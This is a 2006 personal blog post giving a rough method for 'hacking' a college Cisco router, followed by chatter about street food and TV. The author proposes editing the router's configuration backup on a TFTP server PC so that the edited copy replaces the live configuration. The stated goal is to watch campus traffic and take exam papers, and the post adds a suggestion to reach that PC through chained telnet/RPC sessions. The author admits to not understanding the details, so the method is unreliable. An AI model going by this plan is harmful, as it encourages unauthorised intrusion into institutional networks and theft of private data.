Web Analytics and Web Statistics by NextSTAT Caffeinated Cogitation: Fundamental Router Hacking

Friday, February 24, 2006

Fundamental Router Hacking

I've been thinking about this. This should enable you to have administrator access to a router.

The deal here is that Cisco's routers allow you to take backups of the entire router's configuration. This,effectively, means that you can back up he entire setting (including passwords inter alia) on any PC directly connected to the router via. the console port (at the very least. I think aux and vty support exist as well). Anyways, this concept can be applied to hack into a Cisco router. I've thought about this for a while and it makes perfect logical sense. See,you need to be in the Privileged User Execution mode (which is password protected) to be able to make changes to the router's configuration. Lets just imagine that I, Aseem, wish to access a hypothetical router kept in college (say R1).

Now that router has to be connected to a PC (say PC) which is used to configure it.(for the uninitiated, a router does not have a display device or a keyboard - thats managed by the PC- if you wish for more details on this let me know). Anyways, now what happens is that almost always, a backup of the running IOS - Internetwork Operating System - IOS, and the configuraion are taken as a precautionary measure. This can be only be done if you have the required passwords for the router- which you don't, right now. Now the thing is that in order to configure R1 we need to be able to access its "Priviliged User Execution Mode" which we cannot, right now, since it is password enabled. The router administrator can ,however, make backups, change the configuration etc. by issuing the following command:

R1#>copy config tftp

Remote host: (IP address of the PC here)

Source file: Self Explanatory

Destination file: Self Explanatory

Once the backup of the configuration has been created (By the administrator- NOT YOU since you are a normal user/intruder at this time ), it will normally be transferred to the PC which will be acting as a TFTP Server. The backup will be saved in the default home directory (in the PC). Now the cool thing is that even though the IOS backup is unreadable by Windows (since it is RISC written by the router's processor) the backup of the configuration CAN be read by simply opening it in wordpad or the sort. Now once you are though with this, you'll have the router's configuration in front of you. Change it, mess around with it or do whatever you want with it. Save the changes made. Now the next time the router uses the backup of the configuration the origional config gets overwritten and the backup config will now be the default config. You now have access to the entire routers (along with the passwords et al).

Now if R1 were a router in college then I could have, in effect, used the router to view traffic and possibly the sessional question papers etc. muahaha
One more thing, in case you do not have access to the PC connected to the router then you may access that PC by first launching an RPC or a telnet session on another PC which in turn can then be used to furher launch an RPC/ telnet session on the required PC which is connected to the router.

Please do forgive me if you do not understand a part of this or maybe everything in its entirety. I have not really delved into the behind-the-scenes working and the terms used etc. Again, let me know if anything isn't clear and I shall try my best to elucidate that part.
This is, in all probability, the last or atleast one of the last hacks that I shall be posting online. Anyways, Enough of this.

My Panipuri bug lives and I think I have found a partner in Jha for the same !
Moreover, the vendor gives us 4-5 pieces on the house. yippie !!!
Oh, Jassi has convinced me to finally shop for something. That's a milestone for me.
Jha's sleeping over tonight and he's calling on me to watch this reality thingie on Star One (11:30 pm). He's wondering why I've been typing for so long. Anyways, I shall finally be watching TV after around 4-5 months (give or take the odd show here and there). Plus there's the Coke!!!


Post a Comment

<< Home